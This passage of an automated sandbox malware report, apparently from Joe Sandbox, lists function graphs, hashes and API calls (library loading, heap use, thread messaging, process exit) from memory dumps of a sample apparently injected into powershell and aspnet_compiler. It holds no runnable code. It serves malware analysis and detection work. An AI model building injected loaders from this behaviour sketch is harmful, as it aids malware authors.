                                                                                                        control_flow_graph 1179 7d000f0-7d00115 1180 7d0011b-7d00120 1179->1180 1181 7d0028d-7d002d3 1179->1181 1182 7d00122-7d00128 1180->1182 1183 7d00138-7d00144 1180->1183 1188 7d002d9-7d002de 1181->1188 1189 7d0042a-7d0045d 1181->1189 1185 7d0012a 1182->1185 1186 7d0012c-7d00136 1182->1186 1190 7d0023a-7d00244 1183->1190 1191 7d0014a-7d0014d 1183->1191 1185->1183 1186->1183 1192 7d002e0-7d002e6 1188->1192 1193 7d002f6-7d002fa 1188->1193 1203 7d004be-7d004c8 1189->1203 1204 7d0045f-7d0047c 1189->1204 1197 7d00252-7d00258 1190->1197 1198 7d00246-7d0024f 1190->1198 1191->1190 1196 7d00153-7d0015a 1191->1196 1199 7d002e8 1192->1199 1200 7d002ea-7d002f4 1192->1200 1201 7d00300-7d00302 1193->1201 1202 7d003d7-7d003e1 1193->1202 1196->1181 1205 7d00160-7d00165 1196->1205 1208 7d0025a-7d0025c 1197->1208 1209 7d0025e-7d0026a 1197->1209 1199->1193 1200->1193 1210 7d00312 1201->1210 1211 7d00304-7d00310 1201->1211 1206 7d003e3-7d003ec 1202->1206 1207 7d003ef-7d003f5 1202->1207 1213 7d004d1-7d004d7 1203->1213 1214 7d004ca-7d004ce 1203->1214 1234 7d00482-7d00488 1204->1234 1235 7d0050d-7d00512 1204->1235 1215 7d00167-7d0016d 1205->1215 1216 7d0017d-7d00181 1205->1216 1217 7d003f7-7d003f9 1207->1217 1218 7d003fb-7d00407 1207->1218 1219 7d0026c-7d0028a 1208->1219 1209->1219 1212 7d00314-7d00316 1210->1212 1211->1212 1212->1202 1221 7d0031c-7d00320 1212->1221 1222 7d004d9-7d004db 1213->1222 1223 7d004dd-7d004e9 1213->1223 1225 7d00171-7d0017b 1215->1225 1226 7d0016f 1215->1226 1216->1190 1227 7d00187-7d00189 1216->1227 1228 7d00409-7d00427 1217->1228 1218->1228 1231 7d00340 1221->1231 1232 7d00322-7d0033e 1221->1232 1233 7d004eb-7d0050a 1222->1233 1223->1233 1225->1216 1226->1216 1236 7d00199 1227->1236 1237 7d0018b-7d00197 1227->1237 1243 7d00342-7d00344 1231->1243 1232->1243 1241 7d0048a 1234->1241 1242 7d0048c-7d00498 1234->1242 1235->1234 1244 7d0019b-7d0019d 1236->1244 1237->1244 1249 7d0049a-7d004b8 1241->1249 1242->1249 1243->1202 1250 7d0034a-7d0035d 1243->1250 1244->1190 1251 7d001a3-7d001a5 1244->1251 1249->1203 1267 7d00363-7d00365 1250->1267 1255 7d001a7-7d001ad 1251->1255 1256 7d001bf-7d001c8 1251->1256 1261 7d001b1-7d001bd 1255->1261 1262 7d001af 1255->1262 1265 7d001e0-7d00237 1256->1265 1266 7d001ca-7d001d0 1256->1266 1261->1256 1262->1256 1268 7d001d2 1266->1268 1269 7d001d4-7d001d6 1266->1269 1271 7d00367-7d0036d 1267->1271 1272 7d0037d-7d003d4 1267->1272 1268->1265 1269->1265 1273 7d00371-7d00373 1271->1273 1274 7d0036f 1271->1274 1273->1272 1274->1272
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1b0e5adef5463d6bce02515f0a68a66f26cdab353da9ae5a7f2175a9523a5ccc
                                                                                                        • Instruction ID: 4514a99105a7b9a96fc45ae6ed07bbfa745483e4dc34ee0c5499561d7b758c2f
                                                                                                        • Opcode Fuzzy Hash: 1b0e5adef5463d6bce02515f0a68a66f26cdab353da9ae5a7f2175a9523a5ccc
                                                                                                        • Instruction Fuzzy Hash: D6B1F4B1B04306AFDB259A79D8107AAFBA5EFC5211F14D07BD945CB291EB31C841C7E2
                                                                                                        Function 07D009A8 Relevance: .1, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 36631198518543aa595785e8cedd2ebc873ddfcb7b702c8d364152939a6ce660
                                                                                                        • Instruction ID: 0fd5d5646b2fd9d49bb2859bd18e5338a85512ebc790886ea221ce3e49f3aa59
                                                                                                        • Opcode Fuzzy Hash: 36631198518543aa595785e8cedd2ebc873ddfcb7b702c8d364152939a6ce660
                                                                                                        • Instruction Fuzzy Hash: 2231E8F0A14346BFCB248E649A1177AFBB1AF82254F14A0A7D4489B1D2E735C950D7F1
                                                                                                        Function 07D01380 Relevance: .1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4fe66da333ef230a2d1f755a2a905d4026787be2e02405276b0e4aabd8bcb2b
                                                                                                        • Instruction ID: 22f1dd63823d0d6100224d6608bd8cd7ab2974e2d616ab58783789720cc2a9ed
                                                                                                        • Opcode Fuzzy Hash: f4fe66da333ef230a2d1f755a2a905d4026787be2e02405276b0e4aabd8bcb2b
                                                                                                        • Instruction Fuzzy Hash: C2319CB460030EDFCB268E1985407ADBBB5EF41311F19A1A6DC059B1E2E736C945EBE2
                                                                                                        Function 07D01EF8 Relevance: .1, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37449692f02c9b65725a8db95dec898170fed8137fd901bbf501cb7a3454b70f
                                                                                                        • Instruction ID: 714a6405abd3bff7ba907e2b4b4413cba6894960988a3b7d7da52cc9905bfdcb
                                                                                                        • Opcode Fuzzy Hash: 37449692f02c9b65725a8db95dec898170fed8137fd901bbf501cb7a3454b70f
                                                                                                        • Instruction Fuzzy Hash: 5A31D4B1A0530A9FCB15DB25C448B69FFB1BF85310F0890AAD548DB1D1D735E885C7D1
                                                                                                        Function 0354D01D Relevance: .0, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1750814322.000000000354D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0354D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_354d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ef8318b45918111234d1c35762ad1e3473cdcbc5cd0013c8800490035f012c3
                                                                                                        • Instruction ID: 595297c8180f3ef9bd93f0a8b4979c31325ffa2fa434f85eecf7c2ded2c8ab14
                                                                                                        • Opcode Fuzzy Hash: 9ef8318b45918111234d1c35762ad1e3473cdcbc5cd0013c8800490035f012c3
                                                                                                        • Instruction Fuzzy Hash: DD01DF714043449AE724CA22EC84B66BBE8EB81629F18C55AEC5C0B293D2799841CAB2
                                                                                                        Function 0354D006 Relevance: .0, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1750814322.000000000354D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0354D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_354d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ecad84cbcbdbfd9eb5b47c05dca33ca44475c3cd29c86bca0e126987c5da3b85
                                                                                                        • Instruction ID: f315e79c488f9c2ef029b0fb152df54920ee32fcba6c45ec155954f6c49fa29c
                                                                                                        • Opcode Fuzzy Hash: ecad84cbcbdbfd9eb5b47c05dca33ca44475c3cd29c86bca0e126987c5da3b85
                                                                                                        • Instruction Fuzzy Hash: 7501407100E3C09FD7168B259C94B52BFB8EF43224F1D81CBD8988F2A3D2695844CB72

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.5%
                                                                                                        Dynamic/Decrypted Code Coverage:4.7%
                                                                                                        Signature Coverage:8%
                                                                                                        Total number of Nodes:150
                                                                                                        Total number of Limit Nodes:17
                                                                                                        execution_graph 75785 414151 75786 4141ae 75785->75786 75787 4140bc 75785->75787 75788 41417f 75787->75788 75791 42cf63 75787->75791 75792 42cf80 75791->75792 75795 17c2c70 LdrInitializeThunk 75792->75795 75793 4140c5 75795->75793 75694 425343 75695 42535c 75694->75695 75696 4253ec 75695->75696 75697 4253a7 75695->75697 75700 4253e7 75695->75700 75702 42edc3 75697->75702 75701 42edc3 RtlFreeHeap 75700->75701 75701->75696 75705 42d043 75702->75705 75704 4253b7 75706 42d05d 75705->75706 75707 42d06e RtlFreeHeap 75706->75707 75707->75704 75708 42fe63 75709 42fe73 75708->75709 75710 42fe79 75708->75710 75713 42eea3 75710->75713 75712 42fe9f 75716 42cff3 75713->75716 75715 42eebe 75715->75712 75717 42d00d 75716->75717 75718 42d01e RtlAllocateHeap 75717->75718 75718->75715 75719 42c2c3 75720 42c2e0 75719->75720 75723 17c2df0 LdrInitializeThunk 75720->75723 75721 42c308 75723->75721 75796 424fb3 75797 424fcf 75796->75797 75798 424ff7 75797->75798 75799 42500b 75797->75799 75800 42cce3 NtClose 75798->75800 75801 42cce3 NtClose 75799->75801 75802 425000 75800->75802 75803 425014 75801->75803 75806 42eee3 RtlAllocateHeap 75803->75806 75805 42501f 75806->75805 75724 414623 75725 41463c 75724->75725 75730 417db3 75725->75730 75727 41465a 75728 4146a6 75727->75728 75729 414693 PostThreadMessageW 75727->75729 75729->75728 75732 417dd7 75730->75732 75731 417dde 75731->75727 75732->75731 75733 417e13 LdrLoadDll 75732->75733 75734 417e2a 75732->75734 75733->75734 75734->75727 75735 419423 75736 419453 75735->75736 75738 41947f 75736->75738 75739 41b8c3 75736->75739 75740 41b907 75739->75740 75742 41b928 75740->75742 75743 42cce3 75740->75743 75742->75736 75744 42ccfd 75743->75744 75745 42cd0e NtClose 75744->75745 75745->75742 75746 41ab83 75747 41ab97 75746->75747 75749 41abf1 75746->75749 75747->75749 75750 41eac3 75747->75750 75751 41eae9 75750->75751 75758 41ebeb 75751->75758 75759 42ff93 75751->75759 75753 41eb84 75754 41ebe2 75753->75754 75753->75758 75770 42c313 75753->75770 75754->75758 75765 428f43 75754->75765 75757 41ec91 75757->75749 75758->75749 75760 42ff03 75759->75760 75761 42ff60 75760->75761 75762 42eea3 RtlAllocateHeap 75760->75762 75761->75753 75763 42ff3d 75762->75763 75764 42edc3 RtlFreeHeap 75763->75764 75764->75761 75767 428fa8 75765->75767 75766 428fe3 75766->75757 75767->75766 75774 419173 75767->75774 75769 428fc5 75769->75757 75771 42c32d 75770->75771 75782 17c2c0a 75771->75782 75772 42c359 75772->75754 75775 419113 75774->75775 75776 419189 75775->75776 75779 42d093 75775->75779 75778 41915b 75778->75769 75780 42d0ad 75779->75780 75781 42d0be ExitProcess 75780->75781 75781->75778 75783 17c2c1f LdrInitializeThunk 75782->75783 75784 17c2c11 75782->75784 75783->75772 75784->75772 75807 4019fb 75808 401a2e 75807->75808 75811 430333 75808->75811 75814 42e973 75811->75814 75815 42e999 75814->75815 75826 407433 75815->75826 75817 42e9af 75818 401aa7 75817->75818 75829 41b6d3 75817->75829 75820 42e9ce 75821 42e9e3 75820->75821 75823 42d093 ExitProcess 75820->75823 75840 428853 75821->75840 75823->75821 75824 42e9fd 75825 42d093 ExitProcess 75824->75825 75825->75818 75844 416a63 75826->75844 75828 407440 75828->75817 75830 41b6ff 75829->75830 75855 41b5c3 75830->75855 75833 41b744 75836 41b760 75833->75836 75838 42cce3 NtClose 75833->75838 75834 41b72c 75835 41b737 75834->75835 75837 42cce3 NtClose 75834->75837 75835->75820 75836->75820 75837->75835 75839 41b756 75838->75839 75839->75820 75841 4288b5 75840->75841 75843 4288c2 75841->75843 75866 418c23 75841->75866 75843->75824 75846 416a80 75844->75846 75845 416a99 75845->75828 75846->75845 75848 42d743 75846->75848 75850 42d75d 75848->75850 75849 42d78c 75849->75845 75850->75849 75851 42c313 LdrInitializeThunk 75850->75851 75852 42d7ec 75851->75852 75853 42edc3 RtlFreeHeap 75852->75853 75854 42d805 75853->75854 75854->75845 75856 41b5dd 75855->75856 75860 41b6b9 75855->75860 75861 42c3b3 75856->75861 75859 42cce3 NtClose 75859->75860 75860->75833 75860->75834 75862 42c3d0 75861->75862 75865 17c35c0 LdrInitializeThunk 75862->75865 75863 41b6ad 75863->75859 75865->75863 75867 418c4d 75866->75867 75873 41915b 75867->75873 75874 414283 75867->75874 75869 418d7a 75870 42edc3 RtlFreeHeap 75869->75870 75869->75873 75871 418d92 75870->75871 75872 42d093 ExitProcess 75871->75872 75871->75873 75872->75873 75873->75843 75878 4142a3 75874->75878 75876 41430c 75876->75869 75877 414302 75877->75869 75878->75876 75879 41b9e3 RtlFreeHeap LdrInitializeThunk 75878->75879 75879->75877 75880 17c2b60 LdrInitializeThunk

                                                                                                        Executed Functions

                                                                                                        Function 00417DB3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 217 417db3-417dcf 218 417dd7-417ddc 217->218 219 417dd2 call 42f9a3 217->219 220 417de2-417df0 call 42ffa3 218->220 221 417dde-417de1 218->221 219->218 224 417e00-417e11 call 42e443 220->224 225 417df2-417dfd call 430243 220->225 230 417e13-417e27 LdrLoadDll 224->230 231 417e2a-417e2d 224->231 225->224 230->231
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 13b91c398fb724290a6bfd8f40c1848a49aab752f183ec829ec08b07cc2e30f9
                                                                                                        • Instruction ID: 084aa10b5b8921232d7b54641f9f46272c7ea3b8ee902bd84fc01581512eba65
                                                                                                        • Opcode Fuzzy Hash: 13b91c398fb724290a6bfd8f40c1848a49aab752f183ec829ec08b07cc2e30f9
                                                                                                        • Instruction Fuzzy Hash: 4B011EB5E0020DABDB10DBA5DC42FDEB7B8AB54308F5041AAE90897241F635EB588B95
                                                                                                        Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 251 42cce3-42cd1c call 404823 call 42df33 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CD17
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 1a3ac9ed52abc80fff84237a99ff0edf4a748cc7e4aaa16ecd6c3ba37d3716ea
                                                                                                        • Instruction ID: 109f74af0596b1f226133d43c24a83a1300b4f33f5229d465d86d41a5be1e799
                                                                                                        • Opcode Fuzzy Hash: 1a3ac9ed52abc80fff84237a99ff0edf4a748cc7e4aaa16ecd6c3ba37d3716ea
                                                                                                        • Instruction Fuzzy Hash: E0E0DF363102443BD510EA6ADC01F8B736CCBC6720F00401AFA0867181C6B0791182F8
                                                                                                        Function 017C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 1e70dd3f3fb48fb822bf88571bf5688dc7fe331f507cb5fb944eff1ea7e88f24
                                                                                                        • Instruction ID: 54a95b908d77c32696ab2504641c12d8d9ddb1d2a3a465914f63b16e0ecbf7a2
                                                                                                        • Opcode Fuzzy Hash: 1e70dd3f3fb48fb822bf88571bf5688dc7fe331f507cb5fb944eff1ea7e88f24
                                                                                                        • Instruction Fuzzy Hash: 5290023560951802D20071584514706502597D0201F65C421E0424578DC7958B5166A3
                                                                                                        Function 017C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 265 17c2b60-17c2b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                                                                        • Instruction ID: ff9ab6420f54643dbd7d249b8bc3df1e66f5096b634ff15415f738a077b02d68
                                                                                                        • Opcode Fuzzy Hash: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                                                                        • Instruction Fuzzy Hash: 4490026520641403420571584414616802A97E0201B55C031E10145A0DC5258A916227
                                                                                                        Function 017C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c42408b30133e4894fcf01ffe86c7ea04ab1907aa4c72abcce30341976bce344
                                                                                                        • Instruction ID: 64a59ea78afbfd2ebc1b4a7d9e7fb4c44385a159f1e6eea2892ba5720765a871
                                                                                                        • Opcode Fuzzy Hash: c42408b30133e4894fcf01ffe86c7ea04ab1907aa4c72abcce30341976bce344
                                                                                                        • Instruction Fuzzy Hash: 1E90023520541813D21171584504707402997D0241F95C422E0424568DD6568B52A223
                                                                                                        Function 017C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ef723d930a3e7cbdfd82453aefa78692ba86d047aed76f968bc473975c475c1b
                                                                                                        • Instruction ID: 6cabe0933793174898896c693f212cc89bf5bb9e06ee9dd500261cc68aa00ce3
                                                                                                        • Opcode Fuzzy Hash: ef723d930a3e7cbdfd82453aefa78692ba86d047aed76f968bc473975c475c1b
                                                                                                        • Instruction Fuzzy Hash: 0890023520549C02D2107158840474A402597D0301F59C421E4424668DC6958A917223
                                                                                                        Function 004145E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 4145e7-4145eb 2 414656-414691 call 404793 call 425483 0->2 3 4145ed-4145f7 0->3 14 4146b3-4146b8 2->14 15 414693-4146a4 PostThreadMessageW 2->15 5 4145f9-414606 3->5 6 41458c-414595 3->6 5->2 8 4145b0-4145c6 6->8 9 414597-4145a9 6->9 11 4145ca-4145d0 8->11 11->11 13 4145d2-4145e5 11->13 13->0 15->14 16 4146a6-4146b0 15->16 16->14
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(6311_I4d42,00000111,00000000,00000000), ref: 004146A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 6311_I4d42$6311_I4d42
                                                                                                        • API String ID: 1836367815-1003168663
                                                                                                        • Opcode ID: b1da1cff8203dae16a22ad9e1f620a354dba11624f1cbdb9bcb491c49fd2405b
                                                                                                        • Instruction ID: c9ae281c72baf3203d7d6e02417774aa916d8d625f8af2cbdba6cdcca574412b
                                                                                                        • Opcode Fuzzy Hash: b1da1cff8203dae16a22ad9e1f620a354dba11624f1cbdb9bcb491c49fd2405b
                                                                                                        • Instruction Fuzzy Hash: 8B217B32A11255AAC712CF74CC42BEEBBB59F86B18F054195F940AF281D6388947CB9D
                                                                                                        Function 00414615 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 17 414615-414618 18 41461a-41465f call 42ee63 call 42f873 call 417db3 17->18 19 4145fc-414606 17->19 26 414666-414691 call 425483 18->26 27 414661 call 404793 18->27 19->17 30 4146b3-4146b8 26->30 31 414693-4146a4 PostThreadMessageW 26->31 27->26 31->30 32 4146a6-4146b0 31->32 32->30
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(6311_I4d42,00000111,00000000,00000000), ref: 004146A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 6311_I4d42$6311_I4d42
                                                                                                        • API String ID: 1836367815-1003168663
                                                                                                        • Opcode ID: b3a76b93e2c4fc4b63504d7b93a97fb737d0386541c1e6f1aca05c4ffab465bd
                                                                                                        • Instruction ID: 8ac8d4030e8524a581d38290024a35c222cb468bf800d0f9ba87918f3de2347f
                                                                                                        • Opcode Fuzzy Hash: b3a76b93e2c4fc4b63504d7b93a97fb737d0386541c1e6f1aca05c4ffab465bd
                                                                                                        • Instruction Fuzzy Hash: A8110831E442587ADB21D6D19D02FEE7B789F82724F004165FE147B290D67C4A4287AA
                                                                                                        Function 00414623 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 33 414623-414633 34 41463c-41465f call 42f873 call 417db3 33->34 35 414637 call 42ee63 33->35 40 414666-414691 call 425483 34->40 41 414661 call 404793 34->41 35->34 44 4146b3-4146b8 40->44 45 414693-4146a4 PostThreadMessageW 40->45 41->40 45->44 46 4146a6-4146b0 45->46 46->44
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(6311_I4d42,00000111,00000000,00000000), ref: 004146A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 6311_I4d42$6311_I4d42
                                                                                                        • API String ID: 1836367815-1003168663
                                                                                                        • Opcode ID: bc6051a9f26bda540a33ec7eee015b277e46e03184a3691619c32b9f6f89dfde
                                                                                                        • Instruction ID: a245f93fd5147c0e50ab28b7a0c9a38efb5e6aab0e79539a65a0fe5a14c13a38
                                                                                                        • Opcode Fuzzy Hash: bc6051a9f26bda540a33ec7eee015b277e46e03184a3691619c32b9f6f89dfde
                                                                                                        • Instruction Fuzzy Hash: 8F01C831E4125876DB21A6919D02FDF7B7C8F41754F048065FE047B281D6B8560687EA
                                                                                                        Function 00417E67 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 232 417e67-417e68 233 417e18-417e27 LdrLoadDll 232->233 234 417e6a-417e76 232->234 235 417e2a-417e2d 233->235 237 417e78-417e8a 234->237 238 417e9a-417ec3 234->238 239 417f08-417f11 237->239 240 417e8c-417e8e 237->240 238->239
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 75d6153a413565afbe75f178590827d51304cb2d128d0c489f2045283277fc46
                                                                                                        • Instruction ID: ef5bf2f3ed67a54cd15bf79928f46de6a73b54b5cd2a65ee2dbd4bf6e0ebc7d5
                                                                                                        • Opcode Fuzzy Hash: 75d6153a413565afbe75f178590827d51304cb2d128d0c489f2045283277fc46
                                                                                                        • Instruction Fuzzy Hash: D3012673B882269ACB21DEA8A800E99B7E1EF91235F0407AAEB14D70C1C752B95586D4
                                                                                                        Function 0042D043 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 246 42d043-42d084 call 404823 call 42df33 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,19CBA06B,00000007,00000000,00000004,00000000,0041762D,000000F4), ref: 0042D07F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 11ee6f4fe670e68b04c4fbcf4560fcc96f2033ae1d980ac49e5d81d080f95a0c
                                                                                                        • Instruction ID: 345b6422e80a66697e868ea8e7f6989f565a5eb93d2bab6fc450e3f95c6bb0d0
